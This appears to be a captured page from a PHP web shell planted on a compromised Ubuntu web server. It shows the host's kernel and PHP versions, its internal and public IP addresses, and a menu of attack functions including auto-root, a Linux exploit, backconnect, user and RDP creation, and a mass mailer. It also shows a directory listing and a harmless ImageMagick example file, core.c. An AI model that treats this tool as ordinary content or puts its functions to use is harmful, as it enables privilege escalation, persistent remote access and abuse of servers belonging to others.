Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.138.178.162
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
ubuntu /
ImageMagick-7.0.10-22 /
www /
source /
[ HOME SHELL ]
Name
Size
Permission
Action
core
[ DIR ]
drwxrwxr-x
wand
[ DIR ]
drwxrwxr-x
analyze.c
9.71
KB
-rw-rw-r--
coder.xml
899
B
-rw-rw-r--
colors.xml
1.35
KB
-rw-rw-r--
configure.xml
3.58
KB
-rw-rw-r--
contrast.c
2.68
KB
-rw-rw-r--
core.c
1.53
KB
-rw-rw-r--
delegates.xml
13.1
KB
-rw-rw-r--
english.xml
49.83
KB
-rw-rw-r--
examples.pl
10.47
KB
-rw-rw-r--
francais.xml
52.68
KB
-rw-rw-r--
incantation.msl
356
B
-rw-rw-r--
locale.xml
2.4
KB
-rw-rw-r--
log.xml
1.6
KB
-rw-rw-r--
magic.xml
888
B
-rw-rw-r--
mgk.c
15.8
KB
-rw-rw-r--
mime.xml
131.07
KB
-rw-rw-r--
piechart.mvg
3.84
KB
-rw-rw-r--
piechart.svg
2.84
KB
-rw-rw-r--
policy.xml
3.6
KB
-rw-rw-r--
quantization-table.xml
2.31
KB
-rw-rw-r--
thresholds.xml
11.18
KB
-rw-rw-r--
type-apple.xml
28.53
KB
-rw-rw-r--
type-dejavu.xml
9.28
KB
-rw-rw-r--
type-ghostscript.xml
9.45
KB
-rw-rw-r--
type-urw-base35.xml
7.97
KB
-rw-rw-r--
type-windows.xml
15.47
KB
-rw-rw-r--
type.xml
683
B
-rw-rw-r--
wand.c
1.23
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : core.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <magick/MagickCore.h> int main(int argc,char **argv) { ExceptionInfo *exception; Image *image, *images, *resize_image, *thumbnails; ImageInfo *image_info; if (argc != 3) { (void) fprintf(stdout,"Usage: %s image thumbnail\n",argv[0]); exit(0); } /* Initialize the image info structure and read an image. */ MagickCoreGenesis(*argv,MagickTrue); exception=AcquireExceptionInfo(); image_info=CloneImageInfo((ImageInfo *) NULL); (void) strcpy(image_info->filename,argv[1]); images=ReadImage(image_info,exception); if (exception->severity != UndefinedException) CatchException(exception); if (images == (Image *) NULL) exit(1); /* Convert the image to a thumbnail. */ thumbnails=NewImageList(); while ((image=RemoveFirstImageFromList(&images)) != (Image *) NULL) { resize_image=ResizeImage(image,106,80,LanczosFilter,1.0,exception); if (resize_image == (Image *) NULL) MagickError(exception->severity,exception->reason,exception->description); (void) AppendImageToList(&thumbnails,resize_image); DestroyImage(image); } /* Write the image thumbnail. */ (void) strcpy(thumbnails->filename,argv[2]); WriteImage(image_info,thumbnails); /* Destroy the image thumbnail and exit. */ thumbnails=DestroyImageList(thumbnails); image_info=DestroyImageInfo(image_info); exception=DestroyExceptionInfo(exception); MagickCoreTerminus(); return(0); }
Close